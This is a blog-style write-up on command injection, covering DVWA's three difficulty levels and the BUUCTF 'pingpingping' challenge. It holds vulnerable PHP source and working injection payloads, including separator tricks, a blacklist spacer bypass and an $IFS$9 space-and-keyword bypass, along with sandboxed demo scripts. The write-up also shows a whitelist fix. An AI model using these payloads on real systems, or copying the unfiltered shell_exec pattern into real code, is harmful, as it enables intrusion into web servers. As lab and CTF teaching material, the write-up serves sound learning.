Command injection (DVWA+buuctf pingpingping)

Preface

Command injection is closely related to SQL injection and XSS: all three come from developers not thinking through how user input reaches an interpreter. When a web application passes user-supplied characters into a system command without filtering them, or with filtering that is too loose, the attacker can append commands of their own. It typically turns up in web applications that shell out to the operating system, such as content management systems (CMS).

In other words, wherever input ends up on a command line (cmd, sh, bash) there are a few tricks to play. Naturally, in a CTF you should expect the obvious keywords to be blocked, and there are bypass techniques for that as well.

Below, the three DVWA command injection levels and one CTF example illustrate this.

DVWA command injection

The back-end code concatenates the user-supplied ip parameter into a ping command and executes it with no filtering at all. So we can append our own commands with the usual shell separators: on a Linux system "&", "|", "&&", "||", ";" and backticks "`".

For shell1 & shell2, shell1 is started in the background and shell2 runs immediately; both commands execute;

For shell1 && shell2, shell2 runs only if shell1 succeeds (exit status 0); if shell1 fails, shell2 is not executed. This is logical AND;

For shell1 | shell2, "|" is the pipe: the standard output of shell1 becomes the standard input of shell2. shell2 is executed regardless of whether shell1 succeeded;

For shell1 || shell2, shell2 runs only if shell1 fails; if shell1 succeeds, shell2 is not executed. This is logical OR;

For shell1;shell2, shell1 and shell2 are both executed in sequence (on Linux; cmd.exe does not treat ";" as a separator);

For shell1 `shell2`, the backticks are command substitution: shell2 runs first and its output is pasted into shell1's command line. With ping, the output of shell2 therefore shows up inside ping's error message (an "unknown host" style complaint that quotes the mangled argument).
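To make these separators concrete, here is an added example that is not part of the original post or of DVWA: a POSIX sh script standing in for the low level's shell_exec('ping -c 3 ' . $target). The real ping is replaced by a stub shell function (an assumption, so the script runs offline), but the attacker string is still concatenated unfiltered into a string handed to /bin/sh -c, exactly what PHP's shell_exec does, so the parsing is the same.

```sh
#!/bin/sh
# Added example (not DVWA code): stand-in for shell_exec('ping -c 3 ' . $target).
# STUB defines a fake ping for the inner shell so nothing touches the network.
STUB='ping() { for a; do :; done
  case "$a" in
    127.0.0.1) echo "PING $a: 3 packets transmitted" ;;
    *) echo "ping: unknown host $a" >&2; return 2 ;;
  esac; }'

vuln_ping() {
    # $1 is the attacker-controlled "ip" field, concatenated verbatim.
    sh -c "$STUB; ping -c 3 $1" 2>&1
}

# One payload per separator from the list above. The word INJECTED
# appearing in the output proves the attacker's command actually ran.
demo_semicolon()  { vuln_ping '127.0.0.1;echo INJECTED'; }       # both run
demo_and_and()    { vuln_ping '127.0.0.1&&echo INJECTED'; }      # ping ok, so echo runs
demo_or_or()      { vuln_ping '127.0.0.1||echo INJECTED'; }      # ping ok, so echo skipped
demo_or_or_fail() { vuln_ping 'nowhere||echo INJECTED'; }        # ping fails, so echo runs
demo_pipe()       { vuln_ping '127.0.0.1|tr 0-9 X'; }            # ping output fed to tr
demo_backtick()   { vuln_ping '127.0.0.1`echo INJECTED`'; }      # output pasted into ping's argument
demo_amp()        { vuln_ping '127.0.0.1&echo INJECTED'; }       # both run, ping in the background

for d in demo_semicolon demo_and_and demo_or_or demo_or_or_fail \
         demo_pipe demo_backtick demo_amp; do
    printf '== %s ==\n' "$d"; "$d"
done
```

The backtick case is the one worth staring at: the stub never sees a valid host, so the only trace of `echo INJECTED` is the "unknown host 127.0.0.1INJECTED" error, which is precisely how the substituted output leaks through ping's own error message. With "&" the order of the two output lines is not guaranteed, because ping runs in the background.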

Link to the original material here: https://blog.csdn.net/qq_32261191/article/details/101686779

dvwa-low


Source code:

Command Execution Source
<?php

if( isset( $_POST[ 'submit' ] ) ) {

    $target = $_REQUEST[ 'ip' ];

    // Determine OS and execute the ping command.
    if (stristr(php_uname('s'), 'Windows NT')) { 
    
        $cmd = shell_exec( 'ping  ' . $target );
        echo '<pre>'.$cmd.'</pre>';
        
    } else { 
    
        $cmd = shell_exec( 'ping  -c 3 ' . $target );
        echo '<pre>'.$cmd.'</pre>';
        
    }
    
}
?>

The target is executed without any filtering, so any of the separators above can be used to run further commands and gather more information.

dvwa-medium

Source code:

Command Execution Source
<?php

if( isset( $_POST[ 'submit'] ) ) {

    $target = $_REQUEST[ 'ip' ];

    // Remove any of the charactars in the array (blacklist).
    $substitutions = array(
        '&&' => '',
        ';' => '',
    );

    $target = str_replace( array_keys( $substitutions ), $substitutions, $target );
    
    // Determine OS and execute the ping command.
    if (stristr(php_uname('s'), 'Windows NT')) { 
    
        $cmd = shell_exec( 'ping  ' . $target );
        echo '<pre>'.$cmd.'</pre>';
        
    } else { 
    
        $cmd = shell_exec( 'ping  -c 3 ' . $target );
        echo '<pre>'.$cmd.'</pre>';
        
    }
}

?>

There is blacklist filtering, but it only strips "&&" and ";", which is obviously incomplete: "&", "|", "||" and backticks are untouched. The replacement is also a single pass in array order (all "&&" first, then all ";"), so a blocked character can be used as a spacer inside another one: "&;&" survives the "&&" pass and becomes "&&" once the ";" is removed. Examples:

127.0.0.1&;&ls
127.0.0.1&ls

dvwa-high

Because of my DVWA version, it is impossible to inject in the high case. This is the written version.
Source code:

Command Execution Source
<?php

if( isset( $_POST[ 'submit' ] ) ) {

    $target = $_REQUEST["ip"];
    
    $target = stripslashes( $target );
    
    
    // Split the IP into 4 octects
    $octet = explode(".", $target);
    
    // Check IF each octet is an integer
    if ((is_numeric($octet[0])) && (is_numeric($octet[1])) && (is_numeric($octet[2])) && (is_numeric($octet[3])) && (sizeof($octet) == 4)  ) {
    
    // If all 4 octets are int's put the IP back together.
    $target = $octet[0].'.'.$octet[1].'.'.$octet[2].'.'.$octet[3];
    
    
        // Determine OS and execute the ping command.
        if (stristr(php_uname('s'), 'Windows NT')) { 
    
            $cmd = shell_exec( 'ping  ' . $target );
            echo '<pre>'.$cmd.'</pre>';
        
        } else { 
    
            $cmd = shell_exec( 'ping  -c 3 ' . $target );
            echo '<pre>'.$cmd.'</pre>';
        
        }
    
    }
    
    else {
        echo '<pre>ERROR: You have entered an invalid IP</pre>';
    }
    
    
}

?>

This check first strips backslashes from the input, splits it on "." into an array, requires every element to be numeric (is_numeric) and the array to have exactly 4 elements, and only then reassembles the four octets into the target. Separators such as ";", "|" or "&" are never numeric, so a payload never reaches shell_exec.

This is also a proper way to prevent the vulnerability: validate the input against the expected format (a whitelist of four numeric octets) rather than blacklisting individual separators.
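To compare the two approaches on the same payloads, here is an added example (not DVWA's code): the medium blacklist and the high-level octet check re-implemented as shell functions. The high check here is slightly stricter than PHP's is_numeric(), which also accepts forms such as "1e3"; that difference does not matter for injection, since neither accepts a separator character.

```sh
#!/bin/sh
# Added example (not DVWA code): the medium and high checks as shell functions.

# Medium: str_replace(array('&&' => '', ';' => ''), ...) applied in that order,
# one pass per search string over the whole input.
medium_filter() {
    printf '%s' "$1" | sed -e 's/&&//g' -e 's/;//g'
}

# High: explode(".", $target) must give exactly 4 fields, each numeric,
# and only the reassembled octets are used. Runs in a subshell so the
# IFS change does not leak.
high_validate() (
    IFS=.                       # explode on "."
    set -f                      # no globbing while splitting
    set -- $1
    [ "$#" -eq 4 ] || return 1  # sizeof($octet) == 4
    for octet; do
        case "$octet" in
            ''|*[!0-9]*) return 1 ;;   # digits only (stricter than is_numeric)
        esac
    done
    printf '%s.%s.%s.%s' "$1" "$2" "$3" "$4"
)

# Constructed payloads: a clean IP, the "&;&" spacer trick, a pipe, five octets.
for p in '127.0.0.1' '127.0.0.1&;&ls' '127.0.0.1|ls' '127.0.0.1.1'; do
    printf 'payload %-16s medium -> %-16s high -> %s\n' \
        "$p" "$(medium_filter "$p")" "$(high_validate "$p" || echo REJECTED)"
done
```

Run as-is it prints one line per payload: the medium filter turns "&;&" into "&&" and passes "|" through unchanged, while the octet check rejects everything that is not four plain numbers.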

Example: buuctf pingpingping

After opening the page there is the typical "check an IP" form; ls and other commands can be appended to the IP.

Probing shows that sensitive words are blocked and the page reports an error when one is detected. Mixed-case and double writing (e.g. fllag) do not bypass it.

The key obstacle is that the keyword flag is blocked.

There is also an index file to read, but spaces are blocked too.
So, some supplementary knowledge:
In bash, a space can be bypassed in the following ways
① < and > redirection (e.g. cat<index.php)

② %20 (URL-encoded space)

③ %09 (URL-encoded tab)

④ $IFS$9 (or ${IFS})

After testing, only the fourth one works here. IFS is the shell's Internal Field Separator (space, tab and newline by default): an unquoted $IFS expands to those characters and the shell splits the word at that point, so cat$IFS$9index.php is parsed as "cat index.php". The $9 (or $1, as in the payload below) is an empty positional parameter whose only job is to terminate the variable name, otherwise the shell would look for a variable called IFSindex.
payload:

127.0.0.1;cat$IFS$1index.php


The flag filter is a regular expression, so padding the word, such as fllag, does not help. Instead the letters are assembled from two variables at execution time, so the word flag never appears in the request:
payload:

?ip=123;a=ag;b=fl;cat$IFS$9$b$a.php

Note that ag must be assigned before fl. The filter matches the letters f, l, a, g appearing in that order anywhere in the input, so a=fl;b=ag would still trip it (and so would fllag), whereas a=ag;b=fl does not contain the sequence and $b$a still expands to flag.
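Here is an added example (not the challenge's code) that reproduces the two checks this writeup describes, a whitespace block and an in-order match on f, l, a, g, in front of the same unfiltered shell_exec pattern, and runs the payloads above against it. The filter is an approximation: the real challenge has further checks that are not reproduced here. The ping command is a stub, and the index.php and flag.php it reads are constructed files in a temporary directory.

```sh
#!/bin/sh
# Added example (not the challenge's code): approximation of the pingpingping
# filters, with a stub ping and a constructed web root.

SANDBOX=$(mktemp -d)                     # constructed stand-in for the web root
trap 'rm -rf "$SANDBOX"' EXIT
printf '<?php /* constructed stand-in for index.php */\n' > "$SANDBOX/index.php"
printf 'flag{constructed_example}\n' > "$SANDBOX/flag.php"

# Assumed filter: reject any whitespace (so %20 and %09 both fail) and
# reject the letters f, l, a, g appearing in that order anywhere in the
# input (so fllag, and a=fl;b=ag, fail as well).
ctf_filter() {
    case "$1" in *[[:space:]]*) echo 'blocked: whitespace'; return 1 ;; esac
    if printf '%s' "$1" | grep -q 'f.*l.*a.*g'; then
        echo 'blocked: flag'; return 1
    fi
}

# Stub ping: prints its last argument. The rest of the line runs as-is.
STUB='ping() { for a; do :; done; echo "PING $a"; }'

ctf_ping() {
    ctf_filter "$1" || return 1
    sh -c "cd '$SANDBOX'; $STUB; ping -c 4 $1" 2>&1
}

# $IFS expands to the separator characters themselves and $9 is an empty
# positional parameter that only ends the variable name, so the inner shell
# sees "cat index.php" although the request contains no space.
demo_ifs()         { ctf_ping '123;cat$IFS$9index.php'; }
# "flag" is never written in the request; $b$a is assembled by the shell.
demo_flag()        { ctf_ping '123;a=ag;b=fl;cat$IFS$9$b$a.php'; }
# Same idea with the assignments swapped: fl ... ag contains f,l,a,g in order.
demo_wrong_order() { ctf_ping '123;a=fl;b=ag;cat$IFS$9$b$a.php'; }

for d in demo_ifs demo_flag demo_wrong_order; do
    printf '== %s ==\n' "$d"; "$d"
done
```

demo_ifs and demo_flag print the stub's "PING 123" line followed by the file contents; demo_wrong_order never reaches the shell and prints only the filter's rejection, which is the ordering point made above. Note that $IFS is upper case, so it does not contribute an "f" to the in-order match.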

Tags: Linux PHP bash Cyber Security

Posted by A JM on Mon, 20 Sep 2021 18:35:25 +0530